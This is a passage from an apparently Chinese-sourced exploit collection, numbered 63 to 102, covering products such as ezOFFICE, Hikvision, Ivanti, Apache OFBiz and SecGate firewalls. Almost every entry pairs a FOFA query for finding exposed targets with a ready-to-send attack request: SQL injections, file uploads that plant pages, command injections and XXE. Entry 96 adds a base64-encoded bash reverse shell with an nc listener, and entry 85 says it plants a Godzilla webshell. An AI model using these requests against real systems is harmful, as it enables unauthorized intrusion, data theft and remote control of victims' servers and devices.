Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神SecGate3600防火墙 obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

